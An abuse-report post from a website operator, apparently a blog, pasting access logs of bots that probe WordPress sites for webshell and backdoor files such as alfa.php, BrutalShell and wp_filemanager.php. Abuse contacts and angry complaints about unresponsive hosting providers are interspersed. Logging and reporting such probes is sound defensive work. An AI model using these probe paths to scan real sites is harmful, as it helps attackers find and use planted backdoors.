52.148.81.157 website*x.com – – [30/Aug/2025:03:16:47 +0200] „GET /page.php HTTP/1.0“ 302 – „-“ „-“
52.148.81.157 website*x.com – – [30/Aug/2025:03:16:47 +0200] „GET /data.php HTTP/1.0“ 302 – „-“ „-“
52.148.81.157 website*x.com – – [30/Aug/2025:03:16:48 +0200] „GET /alfa.php HTTP/1.0“ 302 – „-“ „-“
52.148.81.157 website*x.com – – [30/Aug/2025:03:16:49 +0200] „GET /ss.php HTTP/1.0“ 403 – „-“ „-“
52.148.81.157 website*x.com – – [30/Aug/2025:03:16:49 +0200] „GET /h.php HTTP/1.0“ 302 – „-“ „-“
52.148.81.157 website*x.com – – [30/Aug/2025:03:16:50 +0200] „GET /hi.php HTTP/1.0“ 302 – „-“ „-“
52.148.81.157 website*x.com – – [30/Aug/2025:03:16:50 +0200] „GET /ini.php HTTP/1.0“ 302 – „-“ „-“
52.148.81.157 website*x.com – – [30/Aug/2025:03:16:51 +0200] „GET /faq.php HTTP/1.0“ 302 – „-“ „-“
52.148.81.157 website*x.com – – [30/Aug/2025:03:16:51 +0200] „GET /elp.php HTTP/1.0“ 302 – „-“ „-“
52.148.81.157 website*x.com – – [30/Aug/2025:03:16:52 +0200] „GET /erin1.PhP7 HTTP/1.0“ 403 – „-“ „-“
52.148.81.157 website*x.com – – [30/Aug/2025:03:16:52 +0200] „GET /astab.php HTTP/1.0“ 302 – „-“ „-“
52.148.81.157 website*x.com – – [30/Aug/2025:03:16:53 +0200] „GET /Njima.php HTTP/1.0“ 302 – „-“ „-“
52.148.81.157 website*x.com – – [30/Aug/2025:03:16:53 +0200] „GET /packed.php HTTP/1.0“ 302 – „-“ „-“
+
40.69.66.178 website*x.com – – [30/Aug/2025:09:17:26 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
40.69.66.178 website*x.com – – [30/Aug/2025:09:17:26 +0200] „GET /CLA.php HTTP/1.0“ 302 – „-“ „-“
40.69.66.178 website*x.com – – [30/Aug/2025:09:17:27 +0200] „GET /gfile.php HTTP/1.0“ 302 – „-“ „-“
40.69.66.178 website*x.com – – [30/Aug/2025:09:17:27 +0200] „GET /aua.php HTTP/1.0“ 302 – „-“ „-“
40.69.66.178 website*x.com – – [30/Aug/2025:09:17:27 +0200] „GET /Sanskrit.php HTTP/1.0“ 302 – „-“ „-“
+
72.144.141.63 website*x.com – – [30/Aug/2025:11:45:14 +0200] „GET /aa.php HTTP/1.0“ 302 – „-“ „-“
+
74.241.246.197 website*x.com – – [30/Aug/2025:15:46:58 +0200] „GET /chosen.php HTTP/1.0“ 301 – „-“ „-“
74.241.246.197 www.website*x.com – – [30/Aug/2025:15:46:59 +0200] „GET /chosen.php HTTP/1.0“ 302 – „-“ „-“
AS401120 – cheapy.host LLC – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@cheapy.host – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
196.251.81.64 website*x.com – – [30/Aug/2025:15:12:22 +0200] „GET /wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [30/Aug/2025:15:12:22 +0200] „GET /xmlrpc.php?rsd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [30/Aug/2025:15:12:24 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [30/Aug/2025:15:12:24 +0200] „GET /blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [30/Aug/2025:15:12:24 +0200] „GET /web/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [30/Aug/2025:15:12:24 +0200] „GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [30/Aug/2025:15:12:24 +0200] „GET /website/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [30/Aug/2025:15:12:25 +0200] „GET /wp/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [30/Aug/2025:15:12:25 +0200] „GET /news/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [30/Aug/2025:15:12:25 +0200] „GET /2020/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [30/Aug/2025:15:12:25 +0200] „GET /2019/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [30/Aug/2025:15:12:25 +0200] „GET /shop/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [30/Aug/2025:15:12:25 +0200] „GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [30/Aug/2025:15:12:26 +0200] „GET /test/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [30/Aug/2025:15:12:26 +0200] „GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [30/Aug/2025:15:12:26 +0200] „GET /site/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [30/Aug/2025:15:12:26 +0200] „GET /cms/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
196.251.81.64 website*x.com – – [30/Aug/2025:15:12:26 +0200] „GET /sito/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“

MAIL NR. 11 TODAY!
abuse@s-data.ro,abuse@m247.com,abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com,abuse.br@telefonica.com
AS9009 – M247 Europe SRL – HERE WITH 2 IP´S! – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@s-data.ro,abuse@m247.com – ALWAYS ANSWERED ABOUT OUR ABUSE EMAILS! THIS IS VERY GOOD!
37.120.205.142 www.website*x.de – – [30/Aug/2025:03:01:34 +0200] „GET /wp-includes/css/dist/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
37.120.205.142 www.website*x.de – – [30/Aug/2025:03:01:34 +0200] „GET /wp-includes/js/dist/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36“
37.120.205.142 www.website*x.de – – [30/Aug/2025:03:01:34 +0200] „GET /wp-includes/assets/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0“
37.120.205.142 www.website*x.de – – [30/Aug/2025:03:01:34 +0200] „GET /wp-includes/sitemaps/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36“
37.120.205.142 www.website*x.de – – [30/Aug/2025:03:01:34 +0200] „GET /wp-content/plugins/erinyani/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
37.120.205.142 www.website*x.de – – [30/Aug/2025:03:01:34 +0200] „GET /wp-includes/l10n/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
37.120.205.142 www.website*x.de – – [30/Aug/2025:03:01:34 +0200] „GET /wp-content/uploads/2023/11/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0“
37.120.205.142 www.website*x.de – – [30/Aug/2025:03:01:34 +0200] „GET /wp-includes/sodium_compat/lib/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
37.120.205.142 www.website*x.de – – [30/Aug/2025:03:01:35 +0200] „GET /wp-includes/blocks/file/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
37.120.205.142 www.website*x.de – – [30/Aug/2025:03:01:35 +0200] „GET /wp-includes/images/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
37.120.205.142 www.website*x.de – – [30/Aug/2025:03:01:35 +0200] „GET /wp-includes/block-bindings/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0“
37.120.205.142 www.website*x.de – – [30/Aug/2025:03:01:35 +0200] „GET /wp-content/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0“
37.120.205.142 www.website*x.de – – [30/Aug/2025:03:01:35 +0200] „GET /wp-includes/widgets/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36“
37.120.205.142 www.website*x.de – – [30/Aug/2025:03:01:35 +0200] „GET /wp-admin/network/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
37.120.205.142 www.website*x.de – – [30/Aug/2025:03:01:35 +0200] „GET /wp-admin/css/colors/sunrise/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0“
37.120.205.142 www.website*x.de – – [30/Aug/2025:03:01:35 +0200] „GET /wp-includes/theme-compat/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36“
37.120.205.142 www.website*x.de – – [30/Aug/2025:03:01:35 +0200] „GET /wp-content/plugins/ioxi/ioxi/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36“
37.120.205.142 www.website*x.de – – [30/Aug/2025:03:01:36 +0200] „GET /wp-includes/id3/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
37.120.205.142 www.website*x.de – – [30/Aug/2025:03:01:36 +0200] „GET /wp-includes/blocks/query/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
37.120.205.142 www.website*x.de – – [30/Aug/2025:03:01:36 +0200] „GET /wp-includes/js/tinymce/langs/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
37.120.205.142 www.website*x.de – – [30/Aug/2025:03:01:36 +0200] „GET /wp-admin/css/colors/ectoplasm/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
37.120.205.142 www.website*x.de – – [30/Aug/2025:03:01:36 +0200] „GET /wp-includes/blocks/group/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
37.120.205.142 www.website*x.de – – [30/Aug/2025:03:01:36 +0200] „GET /blog/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
37.120.205.142 www.website*x.de – – [30/Aug/2025:03:01:36 +0200] „GET /wp-content/themes/twentytwentyfour/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
and so on… and so on!!!
+
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:45 +0200] „GET /wp-content/plugins/linkpreview/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:45 +0200] „GET /wp-content/plugins/aryabot/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:46 +0200] „GET /wp-content/plugins/BrutalShell/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:46 +0200] „GET /wp-content/plugins/cache-wordpress/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:46 +0200] „GET /wp-content/plugins/cakil/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:46 +0200] „GET /wp-content/plugins/cekidot/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:46 +0200] „GET /wp-content/plugins/db/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:48 +0200] „GET /wp-content/plugins/home/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:48 +0200] „GET /wp-content/plugins/limit/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:48 +0200] „GET /wp-content/plugins/owfsmac/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:48 +0200] „GET /wp-content/plugins/prenota/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:48 +0200] „GET /wp-content/plugins/random/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:48 +0200] „GET /wp-content/plugins/ubh/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:48 +0200] „GET /wp-content/plugins/Uwogh-Segs/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:49 +0200] „GET /wp-content/plugins/wp-diambar/includes/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:49 +0200] „GET /wp-content/plugins/wp-freeform/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:49 +0200] „GET /wp-content/plugins/wp-hps/sh/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:49 +0200] „GET /wp-content/plugins/wpeazvp/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:49 +0200] „GET /wp-content/plugins/zaen/includes/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:49 +0200] „GET /wp-content/uploads/revslider/templates/immersion-photography/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:49 +0200] „GET /patriotic/wp-includes/images/smilies/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:49 +0200] „GET /wp-includes/js/tinymce/plugins/fullscreen/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:50 +0200] „GET /wp-content/plugins/core-stab/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:50 +0200] „GET /wp-content/themes/alera/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:50 +0200] „GET /wp-content/themes/rishi/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:50 +0200] „GET /wp-content/themes/sketch/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:50 +0200] „GET /wp-content/themes/thuoc-nam/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:50 +0200] „GET /wp-content/themes/twentyfive/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:50 +0200] „GET /wp-content/themes/wp-pridmag/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:50 +0200] „GET /wp-content/themes/pridmag/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:51 +0200] „GET /wp-content/themes/zakra/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:51 +0200] „GET /wp-content/uploads/simple-file-list/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:51 +0200] „GET /admin/upload/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:51 +0200] „GET /wp-admin/css/colors/blue/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:51 +0200] „GET /up/.well-known/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:51 +0200] „GET /wp-content/plugins/apikey/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36“
37.120.205.140 www.website*x.de – – [30/Aug/2025:03:01:51 +0200] „GET /images/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36“
and so on… and so on!!!
AS8075 – Microsoft Corporation – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
52.187.110.8 website*x.de – – [30/Aug/2025:03:10:31 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
52.187.110.8 website*x.de – – [30/Aug/2025:03:10:31 +0200] „GET /CLA.php HTTP/1.0“ 302 – „-“ „-“
52.187.110.8 website*x.de – – [30/Aug/2025:03:10:33 +0200] „GET /gfile.php HTTP/1.0“ 302 – „-“ „-“
52.187.110.8 website*x.de – – [30/Aug/2025:03:10:34 +0200] „GET /aua.php HTTP/1.0“ 302 – „-“ „-“
52.187.110.8 website*x.de – – [30/Aug/2025:03:10:34 +0200] „GET /Sanskrit.php HTTP/1.0“ 302 – „-“ „-“
52.187.110.8 website*x.de – – [30/Aug/2025:03:10:35 +0200] „GET /aa.php HTTP/1.0“ 302 – „-“ „-“
52.187.110.8 website*x.de – – [30/Aug/2025:03:10:35 +0200] „GET /great.php HTTP/1.0“ 302 – „-“ „-“
52.187.110.8 website*x.de – – [30/Aug/2025:03:10:36 +0200] „GET /class9.php HTTP/1.0“ 302 – „-“ „-“
52.187.110.8 website*x.de – – [30/Aug/2025:03:10:36 +0200] „GET /pass.php HTTP/1.0“ 403 – „-“ „-“
52.187.110.8 website*x.de – – [30/Aug/2025:03:10:36 +0200] „GET /lock360.php HTTP/1.0“ 302 – „-“ „-“
52.187.110.8 website*x.de – – [30/Aug/2025:03:10:37 +0200] „GET /ot.php HTTP/1.0“ 302 – „-“ „-“
52.187.110.8 website*x.de – – [30/Aug/2025:03:10:37 +0200] „GET /witmm.php HTTP/1.0“ 302 – „-“ „-“
52.187.110.8 website*x.de – – [30/Aug/2025:03:10:38 +0200] „GET /lo.php HTTP/1.0“ 302 – „-“ „-“
52.187.110.8 website*x.de – – [30/Aug/2025:03:10:39 +0200] „GET /asd67.php HTTP/1.0“ 302 – „-“ „-“
AS18881 – TELEFÔNICA BRASIL S.A – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse.br@telefonica.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
2804:7f7:df02:2e98:1c7a:2a91:9af:c045 website*x.de – – [30/Aug/2025:12:54:37 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 10; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/86.0.0.0 Safari/537.36“

MAIL NR. 12 TODAY!
abuse@microsoft.com,msftcs@microsoft.com,cert@microsoft.com,
AS8075 – Microsoft Corporation – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
HERE WITH 2 IP´S! – VERY UNSECURE PROVIDER!!!
52.178.197.183 website*x.de – – [30/Aug/2025:09:25:37 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
